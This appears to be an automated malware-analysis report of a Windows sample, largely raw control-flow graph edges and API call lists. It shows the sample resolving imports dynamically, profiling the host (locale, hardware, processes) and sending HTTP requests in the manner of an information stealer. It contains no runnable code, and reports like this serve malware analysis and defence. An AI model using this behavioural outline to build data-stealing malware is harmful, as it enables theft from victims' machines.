API calls 14269->14270 14271 6838de 14270->14271 14272 6845c0 2 API calls 14271->14272 14273 6838f7 14272->14273 14274 6845c0 2 API calls 14273->14274 14275 683910 14274->14275 14276 6845c0 2 API calls 14275->14276 14277 683929 14276->14277 14278 6845c0 2 API calls 14277->14278 14279 683942 14278->14279 14280 6845c0 2 API calls 14279->14280 14281 68395b 14280->14281 14282 6845c0 2 API calls 14281->14282 14283 683974 14282->14283 14284 6845c0 2 API calls 14283->14284 14285 68398d 14284->14285 14286 6845c0 2 API calls 14285->14286 14287 6839a6 14286->14287 14288 6845c0 2 API calls 14287->14288 14289 6839bf 14288->14289 14290 6845c0 2 API calls 14289->14290 14291 6839d8 14290->14291 14292 6845c0 2 API calls 14291->14292 14293 6839f1 14292->14293 14294 6845c0 2 API calls 14293->14294 14295 683a0a 14294->14295 14296 6845c0 2 API calls 14295->14296 14297 683a23 14296->14297 14298 6845c0 2 API calls 14297->14298 14299 683a3c 14298->14299 14300 6845c0 2 API calls 14299->14300 14301 683a55 14300->14301 14302 6845c0 2 API calls 14301->14302 14303 683a6e 14302->14303 14304 6845c0 2 API calls 14303->14304 14305 683a87 14304->14305 14306 6845c0 2 API calls 14305->14306 14307 683aa0 14306->14307 14308 6845c0 2 API calls 14307->14308 14309 683ab9 14308->14309 14310 6845c0 2 API calls 14309->14310 14311 683ad2 14310->14311 14312 6845c0 2 API calls 14311->14312 14313 683aeb 14312->14313 14314 6845c0 2 API calls 14313->14314 14315 683b04 14314->14315 14316 6845c0 2 API calls 14315->14316 14317 683b1d 14316->14317 14318 6845c0 2 API calls 14317->14318 14319 683b36 14318->14319 14320 6845c0 2 API calls 14319->14320 14321 683b4f 14320->14321 14322 6845c0 2 API calls 14321->14322 14323 683b68 14322->14323 14324 6845c0 2 API calls 14323->14324 14325 683b81 14324->14325 14326 6845c0 2 API calls 14325->14326 14327 683b9a 14326->14327 14328 6845c0 2 API calls 14327->14328 14329 683bb3 14328->14329 14330 6845c0 2 API calls 14329->14330 14331 683bcc 14330->14331 14332 6845c0 2 API calls 
14331->14332 14333 683be5 14332->14333 14334 6845c0 2 API calls 14333->14334 14335 683bfe 14334->14335 14336 6845c0 2 API calls 14335->14336 14337 683c17 14336->14337 14338 6845c0 2 API calls 14337->14338 14339 683c30 14338->14339 14340 6845c0 2 API calls 14339->14340 14341 683c49 14340->14341 14342 6845c0 2 API calls 14341->14342 14343 683c62 14342->14343 14344 6845c0 2 API calls 14343->14344 14345 683c7b 14344->14345 14346 6845c0 2 API calls 14345->14346 14347 683c94 14346->14347 14348 6845c0 2 API calls 14347->14348 14349 683cad 14348->14349 14350 6845c0 2 API calls 14349->14350 14351 683cc6 14350->14351 14352 6845c0 2 API calls 14351->14352 14353 683cdf 14352->14353 14354 6845c0 2 API calls 14353->14354 14355 683cf8 14354->14355 14356 6845c0 2 API calls 14355->14356 14357 683d11 14356->14357 14358 6845c0 2 API calls 14357->14358 14359 683d2a 14358->14359 14360 6845c0 2 API calls 14359->14360 14361 683d43 14360->14361 14362 6845c0 2 API calls 14361->14362 14363 683d5c 14362->14363 14364 6845c0 2 API calls 14363->14364 14365 683d75 14364->14365 14366 6845c0 2 API calls 14365->14366 14367 683d8e 14366->14367 14368 6845c0 2 API calls 14367->14368 14369 683da7 14368->14369 14370 6845c0 2 API calls 14369->14370 14371 683dc0 14370->14371 14372 6845c0 2 API calls 14371->14372 14373 683dd9 14372->14373 14374 6845c0 2 API calls 14373->14374 14375 683df2 14374->14375 14376 6845c0 2 API calls 14375->14376 14377 683e0b 14376->14377 14378 6845c0 2 API calls 14377->14378 14379 683e24 14378->14379 14380 6845c0 2 API calls 14379->14380 14381 683e3d 14380->14381 14382 6845c0 2 API calls 14381->14382 14383 683e56 14382->14383 14384 6845c0 2 API calls 14383->14384 14385 683e6f 14384->14385 14386 6845c0 2 API calls 14385->14386 14387 683e88 14386->14387 14388 6845c0 2 API calls 14387->14388 14389 683ea1 14388->14389 14390 6845c0 2 API calls 14389->14390 14391 683eba 14390->14391 14392 6845c0 2 API calls 14391->14392 14393 683ed3 14392->14393 14394 6845c0 2 API calls 14393->14394 
14395 683eec 14394->14395 14396 6845c0 2 API calls 14395->14396 14397 683f05 14396->14397 14398 6845c0 2 API calls 14397->14398 14399 683f1e 14398->14399 14400 6845c0 2 API calls 14399->14400 14401 683f37 14400->14401 14402 6845c0 2 API calls 14401->14402 14403 683f50 14402->14403 14404 6845c0 2 API calls 14403->14404 14405 683f69 14404->14405 14406 6845c0 2 API calls 14405->14406 14407 683f82 14406->14407 14408 6845c0 2 API calls 14407->14408 14409 683f9b 14408->14409 14410 6845c0 2 API calls 14409->14410 14411 683fb4 14410->14411 14412 6845c0 2 API calls 14411->14412 14413 683fcd 14412->14413 14414 6845c0 2 API calls 14413->14414 14415 683fe6 14414->14415 14416 6845c0 2 API calls 14415->14416 14417 683fff 14416->14417 14418 6845c0 2 API calls 14417->14418 14419 684018 14418->14419 14420 6845c0 2 API calls 14419->14420 14421 684031 14420->14421 14422 6845c0 2 API calls 14421->14422 14423 68404a 14422->14423 14424 6845c0 2 API calls 14423->14424 14425 684063 14424->14425 14426 6845c0 2 API calls 14425->14426 14427 68407c 14426->14427 14428 6845c0 2 API calls 14427->14428 14429 684095 14428->14429 14430 6845c0 2 API calls 14429->14430 14431 6840ae 14430->14431 14432 6845c0 2 API calls 14431->14432 14433 6840c7 14432->14433 14434 6845c0 2 API calls 14433->14434 14435 6840e0 14434->14435 14436 6845c0 2 API calls 14435->14436 14437 6840f9 14436->14437 14438 6845c0 2 API calls 14437->14438 14439 684112 14438->14439 14440 6845c0 2 API calls 14439->14440 14441 68412b 14440->14441 14442 6845c0 2 API calls 14441->14442 14443 684144 14442->14443 14444 6845c0 2 API calls 14443->14444 14445 68415d 14444->14445 14446 6845c0 2 API calls 14445->14446 14447 684176 14446->14447 14448 6845c0 2 API calls 14447->14448 14449 68418f 14448->14449 14450 6845c0 2 API calls 14449->14450 14451 6841a8 14450->14451 14452 6845c0 2 API calls 14451->14452 14453 6841c1 14452->14453 14454 6845c0 2 API calls 14453->14454 14455 6841da 14454->14455 14456 6845c0 2 API calls 14455->14456 14457 6841f3 
14456->14457 14458 6845c0 2 API calls 14457->14458 14459 68420c 14458->14459 14460 6845c0 2 API calls 14459->14460 14461 684225 14460->14461 14462 6845c0 2 API calls 14461->14462 14463 68423e 14462->14463 14464 6845c0 2 API calls 14463->14464 14465 684257 14464->14465 14466 6845c0 2 API calls 14465->14466 14467 684270 14466->14467 14468 6845c0 2 API calls 14467->14468 14469 684289 14468->14469 14470 6845c0 2 API calls 14469->14470 14471 6842a2 14470->14471 14472 6845c0 2 API calls 14471->14472 14473 6842bb 14472->14473 14474 6845c0 2 API calls 14473->14474 14475 6842d4 14474->14475 14476 6845c0 2 API calls 14475->14476 14477 6842ed 14476->14477 14478 6845c0 2 API calls 14477->14478 14479 684306 14478->14479 14480 6845c0 2 API calls 14479->14480 14481 68431f 14480->14481 14482 6845c0 2 API calls 14481->14482 14483 684338 14482->14483 14484 6845c0 2 API calls 14483->14484 14485 684351 14484->14485 14486 6845c0 2 API calls 14485->14486 14487 68436a 14486->14487 14488 6845c0 2 API calls 14487->14488 14489 684383 14488->14489 14490 6845c0 2 API calls 14489->14490 14491 68439c 14490->14491 14492 6845c0 2 API calls 14491->14492 14493 6843b5 14492->14493 14494 6845c0 2 API calls 14493->14494 14495 6843ce 14494->14495 14496 6845c0 2 API calls 14495->14496 14497 6843e7 14496->14497 14498 6845c0 2 API calls 14497->14498 14499 684400 14498->14499 14500 6845c0 2 API calls 14499->14500 14501 684419 14500->14501 14502 6845c0 2 API calls 14501->14502 14503 684432 14502->14503 14504 6845c0 2 API calls 14503->14504 14505 68444b 14504->14505 14506 6845c0 2 API calls 14505->14506 14507 684464 14506->14507 14508 6845c0 2 API calls 14507->14508 14509 68447d 14508->14509 14510 6845c0 2 API calls 14509->14510 14511 684496 14510->14511 14512 6845c0 2 API calls 14511->14512 14513 6844af 14512->14513 14514 6845c0 2 API calls 14513->14514 14515 6844c8 14514->14515 14516 6845c0 2 API calls 14515->14516 14517 6844e1 14516->14517 14518 6845c0 2 API calls 14517->14518 14519 6844fa 14518->14519 
14520 6845c0 2 API calls 14519->14520 14521 684513 14520->14521 14522 6845c0 2 API calls 14521->14522 14523 68452c 14522->14523 14524 6845c0 2 API calls 14523->14524 14525 684545 14524->14525 14526 6845c0 2 API calls 14525->14526 14527 68455e 14526->14527 14528 6845c0 2 API calls 14527->14528 14529 684577 14528->14529 14530 6845c0 2 API calls 14529->14530 14531 684590 14530->14531 14532 6845c0 2 API calls 14531->14532 14533 6845a9 14532->14533 14534 699c10 14533->14534 14535 699c20 43 API calls 14534->14535 14536 69a036 8 API calls 14534->14536 14535->14536 14537 69a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14536->14537 14538 69a146 14536->14538 14537->14538 14539 69a153 8 API calls 14538->14539 14540 69a216 14538->14540 14539->14540 14541 69a298 14540->14541 14542 69a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14540->14542 14543 69a2a5 6 API calls 14541->14543 14544 69a337 14541->14544 14542->14541 14543->14544 14545 69a41f 14544->14545 14546 69a344 9 API calls 14544->14546 14547 69a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14545->14547 14548 69a4a2 14545->14548 14546->14545 14547->14548 14549 69a4ab GetProcAddress GetProcAddress 14548->14549 14550 69a4dc 14548->14550 14549->14550 14551 69a515 14550->14551 14552 69a4e5 GetProcAddress GetProcAddress 14550->14552 14553 69a612 14551->14553 14554 69a522 10 API calls 14551->14554 14552->14551 14555 69a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14553->14555 14556 69a67d 14553->14556 14554->14553 14555->14556 14557 69a69e 14556->14557 14558 69a686 GetProcAddress 14556->14558 14559 695ca3 14557->14559 14560 69a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14557->14560 14558->14557 14561 681590 14559->14561 14560->14559 15680 681670 14561->15680 14564 69a7a0 lstrcpy 14565 6815b5 14564->14565 14566 69a7a0 lstrcpy 14565->14566 14567 6815c7 14566->14567 14568 69a7a0 lstrcpy 
14567->14568 14569 6815d9 14568->14569 14570 69a7a0 lstrcpy 14569->14570 14571 681663 14570->14571 14572 695510 14571->14572 14573 695521 14572->14573 14574 69a820 2 API calls 14573->14574 14575 69552e 14574->14575 14576 69a820 2 API calls 14575->14576 14577 69553b 14576->14577 14578 69a820 2 API calls 14577->14578 14579 695548 14578->14579 14580 69a740 lstrcpy 14579->14580 14581 695555 14580->14581 14582 69a740 lstrcpy 14581->14582 14583 695562 14582->14583 14584 69a740 lstrcpy 14583->14584 14585 69556f 14584->14585 14586 69a740 lstrcpy 14585->14586 14599 69557c 14586->14599 14587 6951f0 20 API calls 14587->14599 14588 695643 StrCmpCA 14588->14599 14589 6956a0 StrCmpCA 14590 6957dc 14589->14590 14589->14599 14591 69a8a0 lstrcpy 14590->14591 14592 6957e8 14591->14592 14593 69a820 2 API calls 14592->14593 14595 6957f6 14593->14595 14594 69a820 lstrlen lstrcpy 14594->14599 14597 69a820 2 API calls 14595->14597 14596 695856 StrCmpCA 14598 695991 14596->14598 14596->14599 14601 695805 14597->14601 14600 69a8a0 lstrcpy 14598->14600 14599->14587 14599->14588 14599->14589 14599->14594 14599->14596 14605 69a740 lstrcpy 14599->14605 14607 695a0b StrCmpCA 14599->14607 14608 6952c0 25 API calls 14599->14608 14612 69a7a0 lstrcpy 14599->14612 14620 69578a StrCmpCA 14599->14620 14623 681590 lstrcpy 14599->14623 14624 69593f StrCmpCA 14599->14624 14625 69a8a0 lstrcpy 14599->14625 14602 69599d 14600->14602 14603 681670 lstrcpy 14601->14603 14604 69a820 2 API calls 14602->14604 14626 695811 14603->14626 14606 6959ab 14604->14606 14605->14599 14609 69a820 2 API calls 14606->14609 14610 695a28 14607->14610 14611 695a16 Sleep 14607->14611 14608->14599 14613 6959ba 14609->14613 14614 69a8a0 lstrcpy 14610->14614 14611->14599 14612->14599 14615 681670 lstrcpy 14613->14615 14616 695a34 14614->14616 14615->14626 14617 69a820 2 API calls 14616->14617 14618 695a43 14617->14618 14619 69a820 2 API calls 14618->14619 14621 695a52 14619->14621 14620->14599 14622 681670 lstrcpy 14621->14622 
14622->14626 14623->14599 14624->14599 14625->14599 14626->13679 14628 69754c 14627->14628 14629 697553 GetVolumeInformationA 14627->14629 14628->14629 14630 697591 14629->14630 14631 6975fc GetProcessHeap RtlAllocateHeap 14630->14631 14632 697619 14631->14632 14633 697628 wsprintfA 14631->14633 14634 69a740 lstrcpy 14632->14634 14635 69a740 lstrcpy 14633->14635 14636 695da7 14634->14636 14635->14636 14636->13700 14638 69a7a0 lstrcpy 14637->14638 14639 684899 14638->14639 15689 6847b0 14639->15689 14641 6848a5 14642 69a740 lstrcpy 14641->14642 14643 6848d7 14642->14643 14644 69a740 lstrcpy 14643->14644 14645 6848e4 14644->14645 14646 69a740 lstrcpy 14645->14646 14647 6848f1 14646->14647 14648 69a740 lstrcpy 14647->14648 14649 6848fe 14648->14649 14650 69a740 lstrcpy 14649->14650 14651 68490b InternetOpenA StrCmpCA 14650->14651 14652 684944 14651->14652 14653 684ecb InternetCloseHandle 14652->14653 15695 698b60 14652->15695 14655 684ee8 14653->14655 15710 689ac0 CryptStringToBinaryA 14655->15710 14656 684963 15703 69a920 14656->15703 14660 684976 14661 69a8a0 lstrcpy 14660->14661 14666 68497f 14661->14666 14662 69a820 2 API calls 14663 684f05 14662->14663 14664 69a9b0 4 API calls 14663->14664 14667 684f1b 14664->14667 14665 684f27 ctype 14669 69a7a0 lstrcpy 14665->14669 14670 69a9b0 4 API calls 14666->14670 14668 69a8a0 lstrcpy 14667->14668 14668->14665 14682 684f57 14669->14682 14671 6849a9 14670->14671 14672 69a8a0 lstrcpy 14671->14672 14673 6849b2 14672->14673 14674 69a9b0 4 API calls 14673->14674 14675 6849d1 14674->14675 14676 69a8a0 lstrcpy 14675->14676 14677 6849da 14676->14677 14678 69a920 3 API calls 14677->14678 14679 6849f8 14678->14679 14680 69a8a0 lstrcpy 14679->14680 14681 684a01 14680->14681 14683 69a9b0 4 API calls 14681->14683 14682->13703 14684 684a20 14683->14684 14685 69a8a0 lstrcpy 14684->14685 14686 684a29 14685->14686 14687 69a9b0 4 API calls 14686->14687 14688 684a48 14687->14688 14689 69a8a0 lstrcpy 14688->14689 14690 684a51 14689->14690 
14691 69a9b0 4 API calls 14690->14691 14692 684a7d 14691->14692 14693 69a920 3 API calls 14692->14693 14694 684a84 14693->14694 14695 69a8a0 lstrcpy 14694->14695 14696 684a8d 14695->14696 14697 684aa3 InternetConnectA 14696->14697 14697->14653 14698 684ad3 HttpOpenRequestA 14697->14698 14700 684b28 14698->14700 14701 684ebe InternetCloseHandle 14698->14701 14702 69a9b0 4 API calls 14700->14702 14701->14653 14703 684b3c 14702->14703 14704 69a8a0 lstrcpy 14703->14704 14705 684b45 14704->14705 14706 69a920 3 API calls 14705->14706 14707 684b63 14706->14707 14708 69a8a0 lstrcpy 14707->14708 14709 684b6c 14708->14709 14710 69a9b0 4 API calls 14709->14710 14711 684b8b 14710->14711 14712 69a8a0 lstrcpy 14711->14712 14713 684b94 14712->14713 14714 69a9b0 4 API calls 14713->14714 14715 684bb5 14714->14715 14716 69a8a0 lstrcpy 14715->14716 14717 684bbe 14716->14717 14718 69a9b0 4 API calls 14717->14718 14719 684bde 14718->14719 14720 69a8a0 lstrcpy 14719->14720 14721 684be7 14720->14721 14722 69a9b0 4 API calls 14721->14722 14723 684c06 14722->14723 14724 69a8a0 lstrcpy 14723->14724 14725 684c0f 14724->14725 14726 69a920 3 API calls 14725->14726 14727 684c2d 14726->14727 14728 69a8a0 lstrcpy 14727->14728 14729 684c36 14728->14729 14730 69a9b0 4 API calls 14729->14730 14731 684c55 14730->14731 14732 69a8a0 lstrcpy 14731->14732 14733 684c5e 14732->14733 14734 69a9b0 4 API calls 14733->14734 14735 684c7d 14734->14735 14736 69a8a0 lstrcpy 14735->14736 14737 684c86 14736->14737 14738 69a920 3 API calls 14737->14738 14739 684ca4 14738->14739 14740 69a8a0 lstrcpy 14739->14740 14741 684cad 14740->14741 14742 69a9b0 4 API calls 14741->14742 14743 684ccc 14742->14743 14744 69a8a0 lstrcpy 14743->14744 14745 684cd5 14744->14745 14746 69a9b0 4 API calls 14745->14746 14747 684cf6 14746->14747 14748 69a8a0 lstrcpy 14747->14748 14749 684cff 14748->14749 14750 69a9b0 4 API calls 14749->14750 14751 684d1f 14750->14751 14752 69a8a0 lstrcpy 14751->14752 14753 684d28 14752->14753 14754 69a9b0 4 
API calls 14753->14754 14755 684d47 14754->14755 14756 69a8a0 lstrcpy 14755->14756 14757 684d50 14756->14757 14758 69a920 3 API calls 14757->14758 14759 684d6e 14758->14759 14760 69a8a0 lstrcpy 14759->14760 14761 684d77 14760->14761 14762 69a740 lstrcpy 14761->14762 14763 684d92 14762->14763 14764 69a920 3 API calls 14763->14764 14765 684db3 14764->14765 14766 69a920 3 API calls 14765->14766 14767 684dba 14766->14767 14768 69a8a0 lstrcpy 14767->14768 14769 684dc6 14768->14769 14770 684de7 lstrlen 14769->14770 14771 684dfa 14770->14771 14772 684e03 lstrlen 14771->14772 15709 69aad0 14772->15709 14774 684e13 HttpSendRequestA 14775 684e32 InternetReadFile 14774->14775 14776 684e67 InternetCloseHandle 14775->14776 14781 684e5e 14775->14781 14779 69a800 14776->14779 14778 69a9b0 4 API calls 14778->14781 14779->14701 14780 69a8a0 lstrcpy 14780->14781 14781->14775 14781->14776 14781->14778 14781->14780 15716 69aad0 14782->15716 14784 6917c4 StrCmpCA 14785 6917cf ExitProcess 14784->14785 14787 6917d7 14784->14787 14786 6919c2 14786->13705 14787->14786 14788 6918ad StrCmpCA 14787->14788 14789 6918cf StrCmpCA 14787->14789 14790 69185d StrCmpCA 14787->14790 14791 69187f StrCmpCA 14787->14791 14792 6918f1 StrCmpCA 14787->14792 14793 691951 StrCmpCA 14787->14793 14794 691970 StrCmpCA 14787->14794 14795 691913 StrCmpCA 14787->14795 14796 691932 StrCmpCA 14787->14796 14797 69a820 lstrlen lstrcpy 14787->14797 14788->14787 14789->14787 14790->14787 14791->14787 14792->14787 14793->14787 14794->14787 14795->14787 14796->14787 14797->14787 14799 69a7a0 lstrcpy 14798->14799 14800 685979 14799->14800 14801 6847b0 2 API calls 14800->14801 14802 685985 14801->14802 14803 69a740 lstrcpy 14802->14803 14804 6859ba 14803->14804 14805 69a740 lstrcpy 14804->14805 14806 6859c7 14805->14806 14807 69a740 lstrcpy 14806->14807 14808 6859d4 14807->14808 14809 69a740 lstrcpy 14808->14809 14810 6859e1 14809->14810 14811 69a740 lstrcpy 14810->14811 14812 6859ee InternetOpenA StrCmpCA 14811->14812 14813 
685a1d 14812->14813 14814 685fc3 InternetCloseHandle 14813->14814 14815 698b60 3 API calls 14813->14815 14816 685fe0 14814->14816 14817 685a3c 14815->14817 14819 689ac0 4 API calls 14816->14819 14818 69a920 3 API calls 14817->14818 14820 685a4f 14818->14820 14821 685fe6 14819->14821 14822 69a8a0 lstrcpy 14820->14822 14823 69a820 2 API calls 14821->14823 14825 68601f ctype 14821->14825 14827 685a58 14822->14827 14824 685ffd 14823->14824 14826 69a9b0 4 API calls 14824->14826 14829 69a7a0 lstrcpy 14825->14829 14828 686013 14826->14828 14831 69a9b0 4 API calls 14827->14831 14830 69a8a0 lstrcpy 14828->14830 14839 68604f 14829->14839 14830->14825 14832 685a82 14831->14832 14833 69a8a0 lstrcpy 14832->14833 14834 685a8b 14833->14834 14835 69a9b0 4 API calls 14834->14835 14836 685aaa 14835->14836 14837 69a8a0 lstrcpy 14836->14837 14838 685ab3 14837->14838 14840 69a920 3 API calls 14838->14840 14839->13711 14841 685ad1 14840->14841 14842 69a8a0 lstrcpy 14841->14842 14843 685ada 14842->14843 14844 69a9b0 4 API calls 14843->14844 14845 685af9 14844->14845 14846 69a8a0 lstrcpy 14845->14846 14847 685b02 14846->14847 14848 69a9b0 4 API calls 14847->14848 14849 685b21 14848->14849 14850 69a8a0 lstrcpy 14849->14850 14851 685b2a 14850->14851 14852 69a9b0 4 API calls 14851->14852 14853 685b56 14852->14853 14854 69a920 3 API calls 14853->14854 14855 685b5d 14854->14855 14856 69a8a0 lstrcpy 14855->14856 14857 685b66 14856->14857 14858 685b7c InternetConnectA 14857->14858 14858->14814 14859 685bac HttpOpenRequestA 14858->14859 14861 685c0b 14859->14861 14862 685fb6 InternetCloseHandle 14859->14862 14863 69a9b0 4 API calls 14861->14863 14862->14814 14864 685c1f 14863->14864 14865 69a8a0 lstrcpy 14864->14865 14866 685c28 14865->14866 14867 69a920 3 API calls 14866->14867 14868 685c46 14867->14868 14869 69a8a0 lstrcpy 14868->14869 14870 685c4f 14869->14870 14871 69a9b0 4 API calls 14870->14871 14872 685c6e 14871->14872 14873 69a8a0 lstrcpy 14872->14873 14874 685c77 14873->14874 14875 
69a9b0 4 API calls 14874->14875 14876 685c98 14875->14876 14877 69a8a0 lstrcpy 14876->14877 14878 685ca1 14877->14878 14879 69a9b0 4 API calls 14878->14879 14880 685cc1 14879->14880 14881 69a8a0 lstrcpy 14880->14881 14882 685cca 14881->14882 14883 69a9b0 4 API calls 14882->14883 14884 685ce9 14883->14884 14885 69a8a0 lstrcpy 14884->14885 14886 685cf2 14885->14886 14887 69a920 3 API calls 14886->14887 14888 685d10 14887->14888 14889 69a8a0 lstrcpy 14888->14889 14890 685d19 14889->14890 14891 69a9b0 4 API calls 14890->14891 14892 685d38 14891->14892 14893 69a8a0 lstrcpy 14892->14893 14894 685d41 14893->14894 14895 69a9b0 4 API calls 14894->14895 14896 685d60 14895->14896 14897 69a8a0 lstrcpy 14896->14897 14898 685d69 14897->14898 14899 69a920 3 API calls 14898->14899 14900 685d87 14899->14900 14901 69a8a0 lstrcpy 14900->14901 14902 685d90 14901->14902 14903 69a9b0 4 API calls 14902->14903 14904 685daf 14903->14904 14905 69a8a0 lstrcpy 14904->14905 14906 685db8 14905->14906 14907 69a9b0 4 API calls 14906->14907 14908 685dd9 14907->14908 14909 69a8a0 lstrcpy 14908->14909 14910 685de2 14909->14910 14911 69a9b0 4 API calls 14910->14911 14912 685e02 14911->14912 14913 69a8a0 lstrcpy 14912->14913 14914 685e0b 14913->14914 14915 69a9b0 4 API calls 14914->14915 14916 685e2a 14915->14916 14917 69a8a0 lstrcpy 14916->14917 14918 685e33 14917->14918 14919 69a920 3 API calls 14918->14919 14920 685e54 14919->14920 14921 69a8a0 lstrcpy 14920->14921 14922 685e5d 14921->14922 14923 685e70 lstrlen 14922->14923 15717 69aad0 14923->15717 14925 685e81 lstrlen GetProcessHeap RtlAllocateHeap 15718 69aad0 14925->15718 14927 685eae lstrlen 14928 685ebe 14927->14928 14929 685ed7 lstrlen 14928->14929 14930 685ee7 14929->14930 14931 685ef0 lstrlen 14930->14931 14932 685f04 14931->14932 14933 685f1a lstrlen 14932->14933 15719 69aad0 14933->15719 14935 685f2a HttpSendRequestA 14936 685f35 InternetReadFile 14935->14936 14937 685f6a InternetCloseHandle 14936->14937 14941 685f61 14936->14941 
14937->14862 14939 69a9b0 4 API calls 14939->14941 14940 69a8a0 lstrcpy 14940->14941 14941->14936 14941->14937 14941->14939 14941->14940 14944 691077 14942->14944 14943 691151 14943->13713 14944->14943 14945 69a820 lstrlen lstrcpy 14944->14945 14945->14944 14947 690db7 14946->14947 14948 690f17 14947->14948 14949 690ea4 StrCmpCA 14947->14949 14950 690e27 StrCmpCA 14947->14950 14951 690e67 StrCmpCA 14947->14951 14952 69a820 lstrlen lstrcpy 14947->14952 14948->13721 14949->14947 14950->14947 14951->14947 14952->14947 14957 690f67 14953->14957 14954 691044 14954->13729 14955 690fb2 StrCmpCA 14955->14957 14956 69a820 lstrlen lstrcpy 14956->14957 14957->14954 14957->14955 14957->14956 14959 69a740 lstrcpy 14958->14959 14960 691a26 14959->14960 14961 69a9b0 4 API calls 14960->14961 14962 691a37 14961->14962 14963 69a8a0 lstrcpy 14962->14963 14964 691a40 14963->14964 14965 69a9b0 4 API calls 14964->14965 14966 691a5b 14965->14966 14967 69a8a0 lstrcpy 14966->14967 14968 691a64 14967->14968 14969 69a9b0 4 API calls 14968->14969 14970 691a7d 14969->14970 14971 69a8a0 lstrcpy 14970->14971 14972 691a86 14971->14972 14973 69a9b0 4 API calls 14972->14973 14974 691aa1 14973->14974 14975 69a8a0 lstrcpy 14974->14975 14976 691aaa 14975->14976 14977 69a9b0 4 API calls 14976->14977 14978 691ac3 14977->14978 14979 69a8a0 lstrcpy 14978->14979 14980 691acc 14979->14980 14981 69a9b0 4 API calls 14980->14981 14982 691ae7 14981->14982 14983 69a8a0 lstrcpy 14982->14983 14984 691af0 14983->14984 14985 69a9b0 4 API calls 14984->14985 14986 691b09 14985->14986 14987 69a8a0 lstrcpy 14986->14987 14988 691b12 14987->14988 14989 69a9b0 4 API calls 14988->14989 14990 691b2d 14989->14990 14991 69a8a0 lstrcpy 14990->14991 14992 691b36 14991->14992 14993 69a9b0 4 API calls 14992->14993 14994 691b4f 14993->14994 14995 69a8a0 lstrcpy 14994->14995 14996 691b58 14995->14996 14997 69a9b0 4 API calls 14996->14997 14998 691b76 14997->14998 14999 69a8a0 lstrcpy 14998->14999 15000 691b7f 14999->15000 15001 
697500 6 API calls 15000->15001 15002 691b96 15001->15002 15003 69a920 3 API calls 15002->15003 15004 691ba9 15003->15004 15005 69a8a0 lstrcpy 15004->15005 15006 691bb2 15005->15006 15007 69a9b0 4 API calls 15006->15007 15008 691bdc 15007->15008 15009 69a8a0 lstrcpy 15008->15009 15010 691be5 15009->15010 15011 69a9b0 4 API calls 15010->15011 15012 691c05 15011->15012 15013 69a8a0 lstrcpy 15012->15013 15014 691c0e 15013->15014 15720 697690 GetProcessHeap RtlAllocateHeap 15014->15720 15017 69a9b0 4 API calls 15018 691c2e 15017->15018 15019 69a8a0 lstrcpy 15018->15019 15020 691c37 15019->15020 15021 69a9b0 4 API calls 15020->15021 15022 691c56 15021->15022 15023 69a8a0 lstrcpy 15022->15023 15024 691c5f 15023->15024 15025 69a9b0 4 API calls 15024->15025 15026 691c80 15025->15026 15027 69a8a0 lstrcpy 15026->15027 15028 691c89 15027->15028 15727 6977c0 GetCurrentProcess IsWow64Process 15028->15727 15031 69a9b0 4 API calls 15032 691ca9 15031->15032 15033 69a8a0 lstrcpy 15032->15033 15034 691cb2 15033->15034 15035 69a9b0 4 API calls 15034->15035 15036 691cd1 15035->15036 15037 69a8a0 lstrcpy 15036->15037 15038 691cda 15037->15038 15039 69a9b0 4 API calls 15038->15039 15040 691cfb 15039->15040 15041 69a8a0 lstrcpy 15040->15041 15042 691d04 15041->15042 15043 697850 3 API calls 15042->15043 15044 691d14 15043->15044 15045 69a9b0 4 API calls 15044->15045 15046 691d24 15045->15046 15047 69a8a0 lstrcpy 15046->15047 15048 691d2d 15047->15048 15049 69a9b0 4 API calls 15048->15049 15050 691d4c 15049->15050 15051 69a8a0 lstrcpy 15050->15051 15052 691d55 15051->15052 15053 69a9b0 4 API calls 15052->15053 15054 691d75 15053->15054 15055 69a8a0 lstrcpy 15054->15055 15056 691d7e 15055->15056 15057 6978e0 3 API calls 15056->15057 15058 691d8e 15057->15058 15059 69a9b0 4 API calls 15058->15059 15060 691d9e 15059->15060 15061 69a8a0 lstrcpy 15060->15061 15062 691da7 15061->15062 15063 69a9b0 4 API calls 15062->15063 15064 691dc6 15063->15064 15065 69a8a0 lstrcpy 15064->15065 15066 691dcf 
Control-flow graph (rendered graph data, not reproduced): edge list of the call graph for the sample's functions in the 0x681590-0x69aad0 range, with node labels naming the lstrcpy/lstrcat/lstrlen string helpers and the APIs GetProcessHeap, RtlAllocateHeap, HeapFree, LocalAlloc, LocalFree, GetLocalTime, GetTimeZoneInformation, GetSystemTime, GetUserDefaultLocaleName, CharToOemW, GetKeyboardLayoutList, GetLocaleInfoA, GetSystemPowerStatus, GetCurrentProcessId, OpenProcess, GetModuleFileNameExA, CloseHandle, RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey, GetLogicalProcessorInformationEx, GetLastError, GetSystemInfo, GlobalMemoryStatusEx, __aulldiv, CreateToolhelp32Snapshot, Process32First, Process32Next, InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle, InternetCrackUrlA, CryptStringToBinaryA, CryptBinaryToStringA, VirtualAlloc, VirtualFree, LoadLibraryA, GetProcAddress, FreeLibrary, StrCmpCA and wsprintfA.

                            Control-flow Graph

                            Graph data not reproduced: function 699860 calls 699750 and 699780, resolves 21 imports through GetProcAddress, loads 5 libraries with LoadLibraryA, then resolves further imports with GetProcAddress (see the API list below).
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013A05E8), ref: 006998A1
                            • GetProcAddress.KERNEL32(75900000,013A0570), ref: 006998BA
                            • GetProcAddress.KERNEL32(75900000,013A0810), ref: 006998D2
                            • GetProcAddress.KERNEL32(75900000,013A0828), ref: 006998EA
                            • GetProcAddress.KERNEL32(75900000,013A0780), ref: 00699903
                            • GetProcAddress.KERNEL32(75900000,013A8A10), ref: 0069991B
                            • GetProcAddress.KERNEL32(75900000,013967A0), ref: 00699933
                            • GetProcAddress.KERNEL32(75900000,01396980), ref: 0069994C
                            • GetProcAddress.KERNEL32(75900000,013A0708), ref: 00699964
                            • GetProcAddress.KERNEL32(75900000,013A05B8), ref: 0069997C
                            • GetProcAddress.KERNEL32(75900000,013A06D8), ref: 00699995
